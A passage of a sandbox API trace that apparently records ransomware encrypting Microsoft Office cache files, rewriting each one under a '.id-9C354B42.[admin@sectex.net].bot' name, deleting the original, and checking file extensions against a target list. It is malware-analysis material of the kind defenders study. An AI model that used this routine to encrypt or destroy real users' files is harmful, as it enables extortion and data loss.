	[0034.386] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0034.386] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.386] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.386] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0034.387] GetLastError () returned 0x0
	[0034.387] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x91975, lpOverlapped=0x0) returned 1
	[0034.400] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x91980, lpOverlapped=0x0) returned 1
	[0034.412] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.412] WriteFile (in: hFile=0x17c, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0034.412] SetEndOfFile (hFile=0x17c) returned 1
	[0034.413] CloseHandle (hObject=0x17c) returned 1
	[0034.419] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.419] SetEndOfFile (hFile=0x1a8) returned 1
	[0035.358] CloseHandle (hObject=0x1a8) returned 1
	[0035.358] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.358] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1
	[0035.358] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.358] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.358] lstrlenW (lpString=".doc") returned 4
	[0035.358] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.358] lstrlenW (lpString=".docx") returned 5
	[0035.359] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1
	[0035.359] lstrlenW (lpString=".pdf") returned 4
	[0035.359] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString=".xls") returned 4
	[0035.359] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString=".xlsx") returned 5
	[0035.359] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1
	[0035.359] lstrlenW (lpString=".ppt") returned 4
	[0035.359] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.359] lstrlenW (lpString=".zip") returned 4
	[0035.359] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.359] lstrlenW (lpString=".rar") returned 4
	[0035.359] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString=".bz2") returned 4
	[0035.359] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString=".7z") returned 3
	[0035.359] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.359] lstrlenW (lpString=".dbf") returned 4
	[0035.359] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.359] lstrlenW (lpString=".1cd") returned 4
	[0035.359] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.359] lstrlenW (lpString=".jpg") returned 4
	[0035.359] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.359] lstrlenW (lpString=".doc") returned 4
	[0035.359] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.359] lstrlenW (lpString=".docx") returned 5
	[0035.359] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1
	[0035.359] lstrlenW (lpString=".pdf") returned 4
	[0035.360] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString=".xls") returned 4
	[0035.360] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString=".xlsx") returned 5
	[0035.360] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1
	[0035.360] lstrlenW (lpString=".ppt") returned 4
	[0035.360] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.360] lstrlenW (lpString=".zip") returned 4
	[0035.360] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.360] lstrlenW (lpString=".rar") returned 4
	[0035.360] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString=".bz2") returned 4
	[0035.360] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString=".7z") returned 3
	[0035.360] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.360] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.360] lstrlenW (lpString=".dbf") returned 4
	[0035.360] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.360] lstrlenW (lpString=".1cd") returned 4
	[0035.360] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.360] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88
	[0035.360] lstrlenW (lpString=".jpg") returned 4
	[0035.360] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.360] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.360] lstrlenW (lpString="ProPlusrWW.xml") returned 14
	[0035.360] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.578] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=16852) returned 1
	[0035.578] CloseHandle (hObject=0x1a8) returned 1
	[0035.578] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020
	[0035.578] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.578] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.578] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.578] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.578] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0035.579] GetLastError () returned 0x0
	[0035.579] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x41d4, lpOverlapped=0x0) returned 1
	[0035.590] WriteFile (in: hFile=0x190, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x41e0, lpOverlapped=0x0) returned 1
	[0035.591] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.591] WriteFile (in: hFile=0x190, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0035.591] SetEndOfFile (hFile=0x190) returned 1
	[0035.592] CloseHandle (hObject=0x190) returned 1
	[0035.592] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.592] SetEndOfFile (hFile=0x1a8) returned 1
	[0035.593] CloseHandle (hObject=0x1a8) returned 1
	[0035.593] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.593] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1
	[0035.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.594] lstrlenW (lpString=".doc") returned 4
	[0035.594] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString=".docx") returned 5
	[0035.594] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.594] lstrlenW (lpString=".pdf") returned 4
	[0035.594] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString=".xls") returned 4
	[0035.594] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString=".xlsx") returned 5
	[0035.594] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.594] lstrlenW (lpString=".ppt") returned 4
	[0035.594] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.594] lstrlenW (lpString=".zip") returned 4
	[0035.594] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.594] lstrlenW (lpString=".rar") returned 4
	[0035.594] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString=".bz2") returned 4
	[0035.594] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString=".7z") returned 3
	[0035.594] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.594] lstrlenW (lpString=".dbf") returned 4
	[0035.594] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.594] lstrlenW (lpString=".1cd") returned 4
	[0035.594] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.594] lstrlenW (lpString=".jpg") returned 4
	[0035.594] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.595] lstrlenW (lpString=".doc") returned 4
	[0035.595] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString=".docx") returned 5
	[0035.595] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.595] lstrlenW (lpString=".pdf") returned 4
	[0035.595] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString=".xls") returned 4
	[0035.595] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString=".xlsx") returned 5
	[0035.595] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.595] lstrlenW (lpString=".ppt") returned 4
	[0035.595] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.595] lstrlenW (lpString=".zip") returned 4
	[0035.595] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.595] lstrlenW (lpString=".rar") returned 4
	[0035.595] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString=".bz2") returned 4
	[0035.595] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString=".7z") returned 3
	[0035.595] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.595] lstrlenW (lpString=".dbf") returned 4
	[0035.595] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.595] lstrlenW (lpString=".1cd") returned 4
	[0035.595] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77
	[0035.595] lstrlenW (lpString=".jpg") returned 4
	[0035.595] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.596] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.596] lstrlenW (lpString="VisiorWW.xml") returned 12
	[0035.596] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.638] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=8723) returned 1
	[0035.638] CloseHandle (hObject=0x1a8) returned 1
	[0035.638] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020
	[0035.639] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.639] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.639] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0035.639] GetLastError () returned 0x0
	[0035.639] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x2213, lpOverlapped=0x0) returned 1
	[0035.728] WriteFile (in: hFile=0x190, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2220, lpOverlapped=0x0) returned 1
	[0035.729] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.729] WriteFile (in: hFile=0x190, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0035.729] SetEndOfFile (hFile=0x190) returned 1
	[0035.729] CloseHandle (hObject=0x190) returned 1
	[0035.731] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.731] SetEndOfFile (hFile=0x1a8) returned 1
	[0035.732] CloseHandle (hObject=0x1a8) returned 1
	[0035.732] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.733] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1
	[0035.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.733] lstrlenW (lpString=".doc") returned 4
	[0035.733] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.733] lstrlenW (lpString=".docx") returned 5
	[0035.733] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.733] lstrlenW (lpString=".pdf") returned 4
	[0035.733] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.733] lstrlenW (lpString=".xls") returned 4
	[0035.733] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.733] lstrlenW (lpString=".xlsx") returned 5
	[0035.733] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.733] lstrlenW (lpString=".ppt") returned 4
	[0035.734] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.734] lstrlenW (lpString=".zip") returned 4
	[0035.734] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.734] lstrlenW (lpString=".rar") returned 4
	[0035.734] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString=".bz2") returned 4
	[0035.734] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString=".7z") returned 3
	[0035.734] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.734] lstrlenW (lpString=".dbf") returned 4
	[0035.734] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.734] lstrlenW (lpString=".1cd") returned 4
	[0035.734] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.734] lstrlenW (lpString=".jpg") returned 4
	[0035.734] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.734] lstrlenW (lpString=".doc") returned 4
	[0035.734] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.734] lstrlenW (lpString=".docx") returned 5
	[0035.735] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.735] lstrlenW (lpString=".pdf") returned 4
	[0035.735] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString=".xls") returned 4
	[0035.735] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString=".xlsx") returned 5
	[0035.735] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.735] lstrlenW (lpString=".ppt") returned 4
	[0035.735] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.735] lstrlenW (lpString=".zip") returned 4
	[0035.735] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.735] lstrlenW (lpString=".rar") returned 4
	[0035.735] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString=".bz2") returned 4
	[0035.735] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString=".7z") returned 3
	[0035.735] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.735] lstrlenW (lpString=".dbf") returned 4
	[0035.735] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.735] lstrlenW (lpString=".1cd") returned 4
	[0035.735] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75
	[0035.735] lstrlenW (lpString=".jpg") returned 4
	[0035.735] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.736] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.736] lstrlenW (lpString="Alphabet.xml") returned 12
